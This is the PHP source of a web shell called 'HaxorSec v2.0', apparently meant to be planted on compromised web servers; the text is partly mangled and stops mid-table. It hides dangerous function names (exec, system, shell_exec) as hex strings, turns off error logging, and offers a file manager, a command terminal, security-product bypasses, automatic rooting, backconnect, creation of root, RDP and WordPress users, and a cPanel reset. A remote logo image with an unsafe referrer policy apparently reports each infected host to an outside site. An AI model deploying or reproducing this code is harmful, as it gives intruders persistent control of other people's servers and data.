@set_time_limit(0);@clearstatcache();@ini_set('error_log', NULL);@ini_set('log_errors', 0);@ini_set('max_execution_time', 0);@ini_set('output_buffering', 0);@ini_set('display_errors', 0);$Array = [ '676574637764', # ge tcw d => 0 '676c6f62', # gl ob => 1 '69735f646972', # is_d ir => 2 '69735f66696c65', # is_ file => 3 '69735f7772697461626c65', # is_wr iteable => 4 '69735f7265616461626c65', # is_re adble => 5 '66696c657065726d73', # fileper ms => 6 '66696c65', # f ile => 7 '7068705f756e616d65', # php_unam e => 8 '6765745f63757272656e745f75736572', # getc urrentuser => 9 '68746d6c7370656369616c6368617273', # html special => 10 '66696c655f6765745f636f6e74656e7473', # fil e_get_contents => 11 '6d6b646972', # mk dir => 12 '746f756368', # to uch => 13 '6368646972', # ch dir => 14 '72656e616d65', # ren ame => 15 '65786563', # exe c => 16 '7061737374687275', # pas sthru => 17 '73797374656d', # syst em => 18 '7368656c6c5f65786563', # sh ell_exec => 19 '706f70656e', # p open => 20 '70636c6f7365', # pcl ose => 21 '73747265616d5f6765745f636f6e74656e7473', # stre amgetcontents => 22 '70726f635f6f70656e', # p roc_open => 23 '756e6c696e6b', # un link => 24 '726d646972', # rmd ir => 25 '666f70656e', # fop en => 26 '66636c6f7365', # fcl ose => 27 '66696c655f7075745f636f6e74656e7473', # file_put_c ontents => 28 '6d6f76655f75706c6f616465645f66696c65', # move_up loaded_file => 29 '63686d6f64', # ch mod => 30 '7379735f6765745f74656d705f646972', # temp _dir => 31 '6261736536345F6465636F6465', # => bas e6 4 _decode => 32 '6261736536345F656E636F6465', # => ba se6 4_ encode => 33 '636f7079' # co py => 34];$hitung_array = count($Array);for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = unx($Array[$i]);}if (isset($_GET['d'])) { $cdir = unx($_GET['d']); $fungsi[14]($cdir);} else { $cdir = $fungsi[0]();}function file_ext($file){ if (mime_content_type($file) == 'image/png' or mime_content_type($file) == 'image/jpeg') { return '<i class="fa-regular fa-image" style="color:#09e3a5"></i>'; } else if (mime_content_type($file) == 'application/x-httpd-php' or mime_content_type($file) == 'text/html') { return '<i class="fa-solid fa-file-code" style="color:#0985e3"></i>'; } else if (mime_content_type($file) == 'text/javascript') { return '<i class="fa-brands fa-square-js"></i>'; } else if (mime_content_type($file) == 'application/zip' or mime_content_type($file) == 'application/x-7z-compressed') { return '<i class="fa-solid fa-file-zipper" style="color:#e39a09"></i>'; } else if (mime_content_type($file) == 'text/plain') { return '<i class="fa-solid fa-file" style="color:#edf7f5"></i>'; } else if (mime_content_type($file) == 'application/pdf') { return '<i class="fa-regular fa-file-pdf" style="color:#ba2b0f"></i>'; } else { return '<i class="fa-regular fa-file-code" style="color:#0985e3"></i>'; }}function download($file){ if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; }}if (!empty($_GET['don'])) { $FilesDon = download(unx($_GET['don']));}<!DOCTYPE html><html lang="en"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <meta name="googlebot" content="noindex">HaxorSec [ <?= $_SERVER['SERVER_NAME']; ?> ] <title>HaxorSec [ = $_SERVER['SERVER_NAME']; ]</title> <script src="https://cdn.tailwindcss.com"></script> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.63.0/codemirror.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.63.0/theme/ayu-mirage.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.63.0/addon/hint/show-hint.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script> <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.63.0/codemirror.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.63.0/mode/xml/xml.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.63.0/mode/javascript/javascript.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.63.0/addon/hint/show-hint.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.63.0/addon/hint/xml-hint.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.63.0/addon/hint/html-hint.min.js"></script> <style> @import url('https://fonts.googleapis.com/css2?family=Orbitron:wght@400;500;600;700&family=Roboto+Mono:wght@300;400;500;600;700&display=swap'); :root { --primary: #0f172a; --secondary: #020617; --accent: #3b82f6; --accent-hover: #60a5fa; --text: #e2e8f0; --highlight: #93c5fd; --danger: #ef4444; --success: #10b981; --warning: #f59e0b; } body { font-family: 'Roboto Mono', monospace; background-color: var(--secondary); color: var(--text); margin: 0; padding: 0; overflow-x: hidden; } .cyber-font { font-family: 'Orbitron', sans-serif; } .glass-effect { background: rgba(15, 23, 42, 0.7); backdrop-filter: blur(10px); -webkit-backdrop-filter: blur(10px); border: 1px solid rgba(255, 255, 255, 0.1); box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); } .cyber-border { border: 1px solid rgba(59, 130, 246, 0.3); box-shadow: 0 0 10px rgba(59, 130, 246, 0.3); } .sidebar { width: 280px; transition: all 0.3s; background: linear-gradient(135deg, rgba(15, 23, 42, 0.9) 0%, rgba(2, 6, 23, 0.9) 100%); } .main-content { margin-left: 280px; transition: all 0.3s; } .file-icon { transition: all 0.2s; } .file-icon:hover { transform: scale(1.1); } .nav-link { transition: all 0.2s; border-left: 3px solid transparent; } .nav-link:hover { background: rgba(59, 130, 246, 0.1); border-left: 3px solid var(--accent); } .nav-link.active { background: rgba(59, 130, 246, 0.2); border-left: 3px solid var(--accent); } .badge { background: #830000; color: white; font-size: 0.7rem; padding: 2px 6px; border-radius: 4px; } .file-item:hover { background: rgba(59, 130, 246, 0.1); } .action-btn { transition: all 0.2s; opacity: 0; } .file-item:hover .action-btn { opacity: 1; } ::-webkit-scrollbar { width: 8px; height: 8px; } ::-webkit-scrollbar-track { background: var(--secondary); } ::-webkit-scrollbar-thumb { background: var(--accent); border-radius: 4px; } .CodeMirror { height: 70vh; font-family: 'Roboto Mono', monospace !important; font-size: 14px; } .terminal-output { font-family: 'Roboto Mono', monospace; background: #0f172a; color: #93c5fd; } .terminal-input { font-family: 'Roboto Mono', monospace; background: #0f172a; color: #93c5fd; caret-color: #93c5fd; } .path-breadcrumb { font-family: 'Roboto Mono', monospace; } .file-type-icon { width: 24px; height: 24px; display: inline-flex; align-items: center; justify-content: center; margin-right: 8px; } /* Database connection form */ .db-form-input { background: rgba(15, 23, 42, 0.5); border: 1px solid rgba(59, 130, 246, 0.3); color: var(--text); padding: 0.75rem; border-radius: 0.25rem; margin-bottom: 1rem; width: 100%; } .db-form-input:focus { outline: none; border-color: var(--accent); box-shadow: 0 0 0 2px rgba(59, 130, 246, 0.3); } .db-form-label { display: block; margin-bottom: 0.5rem; color: var(--accent); font-family: 'Orbitron', sans-serif; } .db-connect-btn { background: var(--accent); color: white; border: none; padding: 0.75rem 1.5rem; border-radius: 0.25rem; cursor: pointer; transition: all 0.3s; font-family: 'Orbitron', sans-serif; } .db-connect-btn:hover { background: var(--accent-hover); } /* Database tables list */ .db-tables-list { max-height: 300px; overflow-y: auto; margin-top: 1rem; border: 1px solid rgba(59, 130, 246, 0.3); border-radius: 0.25rem; } .db-table-item { padding: 0.75rem; border-bottom: 1px solid rgba(59, 130, 246, 0.1); cursor: pointer; transition: all 0.3s; } .db-table-item:hover { background: rgba(59, 130, 246, 0.1); } .db-table-item.active { background: rgba(59, 130, 246, 0.2); border-left: 3px solid var(--accent); } /* Cyberpunk glow effect */ .cyber-glow { text-shadow: 0 0 5px rgba(59, 130, 246, 0.7); } .cyber-glow-danger { text-shadow: 0 0 5px rgba(239, 68, 68, 0.7); } .cyber-glow-success { text-shadow: 0 0 5px rgba(16, 185, 129, 0.7); } .cyber-glow-warning { text-shadow: 0 0 5px rgba(245, 158, 11, 0.7); } /* Progress bars */ .progress-container { height: 6px; background: rgba(15, 23, 42, 0.5); border-radius: 3px; overflow: hidden; } .progress-bar { height: 100%; transition: width 0.3s ease; } .progress-cpu { background: linear-gradient(90deg, #3b82f6, #60a5fa); } .progress-mem { background: linear-gradient(90deg, #10b981, #34d399); } .progress-disk { background: linear-gradient(90deg, #f59e0b, #fbbf24); } /* System info cards */ .info-card { background: linear-gradient(135deg, rgba(15, 23, 42, 0.7) 0%, rgba(2, 6, 23, 0.7) 100%); border: 1px solid rgba(59, 130, 246, 0.2); transition: all 0.3s; } .info-card:hover { border-color: rgba(59, 130, 246, 0.5); box-shadow: 0 0 15px rgba(59, 130, 246, 0.2); } /* Process table */ .process-table { width: 100%; border-collapse: collapse; font-size: 0.875rem; } .process-table th { background: rgba(15, 23, 42, 0.5); padding: 0.75rem; text-align: left; border-bottom: 1px solid rgba(59, 130, 246, 0.3); font-family: 'Orbitron', sans-serif; color: var(--accent); } .process-table td { padding: 0.5rem 0.75rem; border-bottom: 1px solid rgba(59, 130, 246, 0.1); } .process-table tr:hover { background: rgba(59, 130, 246, 0.1); } .process-pid { color: var(--accent); font-weight: bold; } .process-user { color: var(--success); } .process-cpu { color: var(--warning); } .process-mem { color: var(--danger); } .process-command { font-family: 'Roboto Mono', monospace; max-width: 200px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } /* Network connections */ .network-table { width: 100%; border-collapse: collapse; font-size: 0.875rem; } .network-table th { background: rgba(15, 23, 42, 0.5); padding: 0.75rem; text-align: left; border-bottom: 1px solid rgba(59, 130, 246, 0.3); font-family: 'Orbitron', sans-serif; color: var(--accent); } .network-table td { padding: 0.5rem 0.75rem; border-bottom: 1px solid rgba(59, 130, 246, 0.1); } .network-table tr:hover { background: rgba(59, 130, 246, 0.1); } .network-local { color: var(--accent); } .network-remote { color: var(--success); } .network-status { color: var(--warning); } .network-pid { color: var(--danger); } /* Database tables */ .database-table { width: 100%; border-collapse: collapse; font-size: 0.875rem; } .database-table th { background: rgba(15, 23, 42, 0.5); padding: 0.75rem; text-align: left; border-bottom: 1px solid rgba(59, 130, 246, 0.3); font-family: 'Orbitron', sans-serif; color: var(--accent); } .database-table td { padding: 0.5rem 0.75rem; border-bottom: 1px solid rgba(59, 130, 246, 0.1); } .database-table tr:hover { background: rgba(59, 130, 246, 0.1); } .database-name { color: var(--accent); } .database-size { color: var(--success); } .database-rows { color: var(--warning); } /* Mobile styles */ @media (max-width: 768px) { .sidebar { width: 100%; position: fixed; height: auto; bottom: 0; left: 0; z-index: 50; transform: translateY(calc(100% - 56px)); transition: transform 0.3s ease; } .sidebar.active { transform: translateY(0); } .main-content { margin-left: 0; margin-bottom: 56px; } .sidebar-toggle { display: flex; position: fixed; top: 0; left: 0; width: 100%; height: 42px; background: rgba(15, 23, 42, 0.9); z-index: 60; justify-content: center; align-items: center; cursor: pointer; backdrop-filter: blur(8px); box-shadow: 0 2px 8px rgba(0,0,0,0.3); } .file-manager-grid { grid-template-columns: 1fr !important; } .file-item { grid-template-columns: repeat(12, 1fr) !important; gap: 0; } .file-info { display: flex; align-items: center; } .file-actions { display: flex; justify-content: flex-end; gap: 8px; } .modal { padding: 0 16px; } .modal-content { width: 100% !important; max-width: 100% !important; } .path-breadcrumb { overflow-x: auto; white-space: nowrap; padding: 8px 0; } .server-info { grid-template-columns: 1fr 1fr !important; gap: 8px; } /* Process table mobile */ .process-table th, .process-table td { padding: 0.5rem; font-size: 0.75rem; } /* Network table mobile */ .network-table th, .network-table td { padding: 0.5rem; font-size: 0.75rem; } /* Database table mobile */ .database-table th, .database-table td { padding: 0.5rem; font-size: 0.75rem; } } /* Dark mode toggle */ .dark-mode-toggle { position: fixed; bottom: 20px; right: 20px; z-index: 100; width: 50px; height: 50px; border-radius: 50%; background: var(--accent); display: flex; justify-content: center; align-items: center; cursor: pointer; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); transition: all 0.3s; } .dark-mode-toggle:hover { transform: scale(1.1); box-shadow: 0 0 15px rgba(59, 130, 246, 0.5); } /* Cyberpunk terminal effect */ .cyber-terminal { position: relative; } .cyber-terminal::before { content: ""; position: absolute; top: 0; left: 0; right: 0; height: 2px; background: linear-gradient(90deg, rgba(59, 130, 246, 0), rgba(59, 130, 246, 0.8), rgba(59, 130, 246, 0)); animation: scanline 2s linear infinite; } @keyframes scanline { 0% { transform: translateY(-100%); } 100% { transform: translateY(100vh); } } /* Cyberpunk buttons */ .cyber-btn { position: relative; overflow: hidden; transition: all 0.3s; border: 1px solid var(--accent); } .cyber-btn::before { content: ""; position: absolute; top: 0; left: -100%; width: 100%; height: 100%; background: linear-gradient(90deg, transparent, rgba(59, 130, 246, 0.4), transparent); transition: all 0.5s; } .cyber-btn:hover::before { left: 100%; } .cyber-btn-danger { border-color: var(--danger); } .cyber-btn-danger::before { background: linear-gradient(90deg, transparent, rgba(239, 68, 68, 0.4), transparent); } .cyber-btn-success { border-color: var(--success); } .cyber-btn-success::before { background: linear-gradient(90deg, transparent, rgba(16, 185, 129, 0.4), transparent); } /* System stats grid */ .stats-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 1rem; } /* Cyberpunk panel */ .cyber-panel { position: relative; border: 1px solid rgba(59, 130, 246, 0.3); background: rgba(15, 23, 42, 0.5); } .cyber-panel::before { content: ""; position: absolute; top: 0; left: 0; right: 0; height: 1px; background: linear-gradient(90deg, transparent, rgba(59, 130, 246, 0.8), transparent); } .cyber-panel::after { content: ""; position: absolute; bottom: 0; left: 0; right: 0; height: 1px; background: linear-gradient(90deg, transparent, rgba(59, 130, 246, 0.8), transparent); } /* Disabled functions table */ .disabled-functions-table { width: 100%; border-collapse: collapse; margin-top: 1rem; } .disabled-functions-table th { background: rgba(15, 23, 42, 0.5); padding: 0.75rem; text-align: left; border-bottom: 1px solid rgba(59, 130, 246, 0.3); font-family: 'Orbitron', sans-serif; color: var(--accent); } .disabled-functions-table td { padding: 0.75rem; border-bottom: 1px solid rgba(59, 130, 246, 0.1); } .disabled-functions-table tr:hover { background: rgba(59, 130, 246, 0.1); } .danger-badge { background: rgba(239, 68, 68, 0.2); color: var(--danger); padding: 0.25rem 0.5rem; border-radius: 0.25rem; font-size: 0.75rem; font-weight: bold; } .success-badge { background: rgba(16, 185, 129, 0.2); color: var(--success); padding: 0.25rem 0.5rem; border-radius: 0.25rem; font-size: 0.75rem; font-weight: bold; } /* Tab navigation */ .tab-nav { display: flex; border-bottom: 1px solid rgba(59, 130, 246, 0.3); margin-bottom: 1rem; } .tab-link { padding: 0.75rem 1.5rem; cursor: pointer; border-bottom: 2px solid transparent; transition: all 0.3s; font-family: 'Orbitron', sans-serif; } .tab-link:hover { color: var(--accent); border-bottom-color: rgba(59, 130, 246, 0.5); } .tab-link.active { color: var(--accent); border-bottom-color: var(--accent); } /* Kill process button */ .kill-process-btn { background: rgba(239, 68, 68, 0.2); color: var(--danger); border: 1px solid var(--danger); padding: 0.25rem 0.5rem; border-radius: 0.25rem; font-size: 0.75rem; cursor: pointer; transition: all 0.3s; } .kill-process-btn:hover { background: rgba(239, 68, 68, 0.4); } /* Database query box */ .query-box { width: 100%; background: rgba(15, 23, 42, 0.5); border: 1px solid rgba(59, 130, 246, 0.3); color: var(--text); padding: 0.75rem; font-family: 'Roboto Mono', monospace; border-radius: 0.25rem; margin-bottom: 1rem; min-height: 100px; } /* Database results */ .query-results { max-height: 400px; overflow-y: auto; margin-top: 1rem; } </style><body class="cyber-terminal"> <div class="sidebar-toggle md:hidden flex items-center justify-center"> <i class="fas fa-bars text-white text-xl"></i> <span class="ml-2 text-white cyber-font">MENU</span> </div> <div class="flex h-screen overflow-hidden"> <div class="sidebar glass-effect h-full fixed left-0 top-0 overflow-y-auto cyber-border"> <div class="p-4"> <div class="flex items-center justify-between mb-6 md:flex hidden"> <div class="flex items-center"> <i class="fas fa-robot text-blue-400 text-2xl mr-2 cyber-glow"></i> <h1 class="text-xl font-bold cyber-font">HAXORSEC<span class="text-blue-400 cyber-glow">v2.0</span> </div> <button class="close-sidebar md:hidden text-gray-400 hover:text-white"> <i class="fas fa-times"></i> </button> </div> <div class="mb-6"> <h3 class="text-xs uppercase tracking-wider text-gray-400 mb-2 px-2 cyber-font">QUICK ACTIONS <a href="?d== hx($fungsi[0]()) " class="bg-blue-600 hover:bg-blue-700 text-white px-3 py-1 rounded text-sm flex items-center cyber-btn"> <i class="fas fa-home mr-1"></i> Home </a>
<div class="flex items-center flex-wrap gap-2"> <a href="" id="create_folder" class="bg-blue-600 hover:bg-blue-700 text-white px-3 py-1 rounded text-sm flex items-center cyber-btn"> <i class="fas fa-folder-plus mr-1"></i> Folder </a> <a href="" id="create_file" class="bg-green-600 hover:bg-green-700 text-white px-3 py-1 rounded text-sm flex items-center cyber-btn cyber-btn-success"> <i class="fas fa-file-circle-plus mr-1"></i> File </a> </div>
<h3 class="text-xs uppercase tracking-wider text-gray-400 mb-2 px-2 cyber-font">NORMAL UPLOAD <h3 class="text-xs uppercase tracking-wider text-gray-400 mb-2 px-2 cyber-font">BITNINJA BYPASS </div> <div class="mb-4"> <h3 class="text-xs uppercase tracking-wider text-gray-400 mb-2 px-2 cyber-font">CYBER TOOLS <ul> <li> <a href="?d== hx($fungsi[0]()) &terminal=normal" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-terminal text-green-400 mr-3 cyber-glow-success"></i> <span>Terminal</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &terminal=chankro" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-terminal text-green-400 mr-3 cyber-glow-success"></i> <span>Terminal Bypass</span> <span class="badge ml-auto text-green-400 cyber-font">TOP</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &scan=suid" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-search text-cyan-400 mr-3 cyber-glow"></i> <span>Scanner SUID</span> <span class="badge ml-auto text-green-400 cyber-font">TOP</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &terminal=root" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-user-shield text-red-400 mr-3 cyber-glow-danger"></i> <span>Auto Root</span> <span class="badge ml-auto cyber-font">ROOT</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &malwarescan" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-shield-alt text-red-400 mr-3"></i> <span>Malware Scanner</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &disabled_functions" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-ban text-red-400 mr-3 cyber-glow-danger"></i> <span>Check Disabled Functions</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &dbmanager" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-database text-blue-400 mr-3 cyber-glow"></i> <span>Database Manager</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &process" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-microchip text-blue-400 mr-3 cyber-glow"></i> <span>Process Manager</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &network" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-network-wired text-green-400 mr-3 cyber-glow-success"></i> <span>Network Connections</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &adminer" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-database text-blue-400 mr-3 cyber-glow"></i> <span>Adminer</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &destroy" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-ghost text-purple-400 mr-3 cyber-glow"></i> <span>Backdoor Destroyer</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &lockshell" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fab fa-linux text-yellow-400 mr-3 cyber-glow-warning"></i> <span>Lock Shell</span> </a> </li> <li> <a href="" id="lock-file" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-lock text-red-400 mr-3 cyber-glow-danger"></i> <span>Lock File</span> </a> </li> <li> <a href="" id="root-user" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-user-plus text-green-400 mr-3 cyber-glow-success"></i> <span>Create User</span> <span class="badge ml-auto cyber-font">ROOT</span> </a> </li> <li> <a href="" id="create-rdp" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-laptop-code text-blue-400 mr-3 cyber-glow"></i> <span>Create RDP</span> </a> </li> <li> <a href="//www.exploit-db.com/search?q=Linux%20Kernel%20= suggest_exploit(); " class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-flask text-orange-400 mr-3 cyber-glow-warning"></i> <span>Linux Exploit</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &mailer" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-envelope text-pink-400 mr-3 cyber-glow"></i> <span>PHP Mailer</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &backconnect" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-user-secret text-purple-400 mr-3 cyber-glow"></i> <span>Backconnect</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &unlockshell" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-unlock text-green-400 mr-3 cyber-glow-success"></i> <span>Unlock Shell</span> </a> </li> <li> <a href="//hashes.com/en/tools/hash_identifier" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fas fa-code text-cyan-400 mr-3 cyber-glow"></i> <span>Hash Identifier</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &cpanelreset" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fab fa-cpanel text-orange-400 mr-3 cyber-glow-warning"></i> <span>CPanel Reset</span> </a> </li> <li> <a href="?d== hx($fungsi[0]()) &createwp" class="nav-link flex items-center px-3 py-2 text-sm rounded-lg mb-1"> <i class="fab fa-wordpress text-blue-400 mr-3 cyber-glow"></i> <span>Create WP User</span> </a> </li> </ul> </div> </div> <img src='https://cdn.privdayz.com/images/logo.jpg' height='15' width='75' referrerpolicy='unsafe-url' /> </div> $file_manager = $fungsi[1]("{.[!.],}*", GLOB_BRACE); $get_cwd = $fungsi[0](); function getSystemInfo() { $info = array(); if (function_exists('sys_getloadavg')) { $load = sys_getloadavg(); $info['cpu_load'] = $load[0]; } else { $info['cpu_load'] = 'N/A'; } if (file_exists('/proc/meminfo')) { $memInfo = file('/proc/meminfo'); $totalMemory = $freeMemory = 0; foreach ($memInfo as $line) { if (strpos($line, 'MemTotal') === 0) { $totalMemory = (int) filter_var($line, FILTER_SANITIZE_NUMBER_INT); } if (strpos($line, 'MemFree') === 0) { $freeMemory = (int) filter_var($line, FILTER_SANITIZE_NUMBER_INT); } } $info['mem_total'] = $totalMemory * 1024; $info['mem_free'] = $freeMemory * 1024; $info['mem_usage'] = $info['mem_total'] - $info['mem_free']; } else { $info['mem_usage'] = $info['mem_total'] = 'N/A'; } if (function_exists('disk_total_space') && function_exists('disk_free_space')) { $info['disk_total'] = disk_total_space('/'); $info['disk_free'] = disk_free_space('/'); $info['disk_used'] = $info['disk_total'] - $info['disk_free']; } else { $info['disk_total'] = $info['disk_free'] = $info['disk_used'] = 'N/A'; } if (file_exists('/proc/uptime')) { $uptime = file_get_contents('/proc/uptime'); $uptime = explode(' ', $uptime); $info['uptime'] = (int)$uptime[0]; } else { $info['uptime'] = 'N/A'; } return $info; } function getProcessList() { $processes = array(); $output = cmd('ps aux'); $lines = explode("\n", $output); array_shift($lines); foreach ($lines as $line) { if (empty($line)) continue; $parts = preg_split('/\s+/', $line); if (count($parts) < 11) continue; $process = array( 'user' => $parts[0], 'pid' => $parts[1], 'cpu' => $parts[2], 'mem' => $parts[3], 'command' => implode(' ', array_slice($parts, 10)) ); $processes[] = $process; } return $processes; } function getNetworkConnections() { $connections = array(); $output = cmd('netstat -tulnp 2>/dev/null'); $lines = explode("\n", $output); array_shift($lines); array_shift($lines); foreach ($lines as $line) { if (empty($line)) continue; $parts = preg_split('/\s+/', $line); if (count($parts) < 6) continue; $connection = array( 'proto' => $parts[0], 'local' => $parts[3], 'remote' => isset($parts[4]) ? $parts[4] : '-', 'status' => isset($parts[5]) ? $parts[5] : '-', 'pid' => isset($parts[6]) ? explode('/', $parts[6])[0] : '-' ); $connections[] = $connection; } return $connections; } $sysInfo = getSystemInfo(); function formatMemory($bytes) { if ($bytes === 'N/A') return 'N/A'; $units = ['B', 'KB', 'MB', 'GB', 'TB']; $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= pow(1024, $pow); return round($bytes, 2) . ' ' . $units[$pow]; } $cpuLoadPercent = $sysInfo['cpu_load'] !== 'N/A' ? min(100, $sysInfo['cpu_load'] * 100) : 0; $memUsagePercent = $sysInfo['mem_usage'] !== 'N/A' && $sysInfo['mem_total'] !== 'N/A' ? ($sysInfo['mem_usage'] / $sysInfo['mem_total']) * 100 : 0; $diskUsagePercent = $sysInfo['disk_total'] !== 'N/A' && $sysInfo['disk_used'] !== 'N/A' ? ($sysInfo['disk_used'] / $sysInfo['disk_total']) * 100 : 0; function formatUptime($seconds) { if ($seconds === 'N/A') return 'N/A'; $hours = floor($seconds / 3600); $minutes = floor(($seconds % 3600) / 60); return sprintf('%dh %dm', $hours, $minutes); } function getDisabledFunctions() { $disabled = ini_get('disable_functions'); if (empty($disabled)) { return array(); } return explode(',', $disabled); } $importantFunctions = array( 'exec', 'system', 'shell_exec', 'passthru', 'proc_open', 'popen', 'curl_exec', 'curl_multi_exec', 'parse_ini_file', 'show_source', 'symlink', 'putenv', 'mail', 'dl', 'chmod', 'chown', 'chgrp', 'link', 'fsockopen', 'pfsockopen', 'posix_kill', 'posix_mkfifo', 'posix_setpgid', 'posix_setsid', 'posix_setuid', 'pcntl_exec', 'imap_open', 'apache_setenv', 'proc_nice', 'proc_terminate', 'proc_get_status', 'escapeshellcmd', 'escapeshellarg', 'ini_restore', 'stream_socket_server' ); $disabledFunctions = getDisabledFunctions(); $disabledImportant = array_intersect($importantFunctions, $disabledFunctions); <div class="main-content flex-1 overflow-auto"> <div class="p-6"> if (isset($_GET['disabled_functions'])): <div class="glass-effect rounded-lg p-6 mb-6 cyber-border"> <div class="flex items-center justify-between mb-4"> <h2 class="text-xl font-bold cyber-font cyber-glow"> <i class="fas fa-ban text-red-400 mr-2"></i> Disabled Functions Check <a href="?d== hx($fungsi[0]()) " class="bg-blue-600 hover:bg-blue-700 text-white px-3 py-1 rounded text-sm flex items-center cyber-btn"> <i class="fas fa-arrow-left mr-1"></i> Back </a> </div> <div class="glass-effect rounded-lg p-4 mb-6 cyber-border"> <div class="grid grid-cols-1 md:grid-cols-3 gap-4"> <div class="flex items-center"> <i class="fas fa-microchip text-blue-400 mr-2 cyber-glow"></i> <div> <div class="text-xs text-gray-400 cyber-font">TOTAL CHECKED</div> <div class="text-sm">= count($importantFunctions) functions</div> </div> </div> <div class="flex items-center"> <i class="fas fa-ban text-red-400 mr-2 cyber-glow-danger"></i> <div> <div class="text-xs text-gray-400 cyber-font">DISABLED</div> <div class="text-sm">= count($disabledImportant) functions</div> </div> </div> <div class="flex items-center"> <i class="fas fa-check-circle text-green-400 mr-2 cyber-glow-success"></i> <div> <div class="text-xs text-gray-400 cyber-font">ENABLED</div> <div class="text-sm">= count($importantFunctions) - count($disabledImportant) functions</div> </div> </div> </div> </div> <div class="glass-effect rounded-lg p-4 cyber-border"> <h3 class="text-lg font-medium cyber-font mb-3 cyber-glow"> <i class="fas fa-list text-blue-400 mr-2"></i> Critical Functions Status <table class="disabled-functions-table"> <thead> <th>Function</th> <th>Status</th>
</thead> <tbody> foreach ($importantFunctions as $func): <td class="font-mono">= $func | if (in_array($func, $disabledFunctions)): <span class="danger-badge cyber-font">DISABLED</span> else: <span class="success-badge cyber-font">ENABLED</span> endif; |
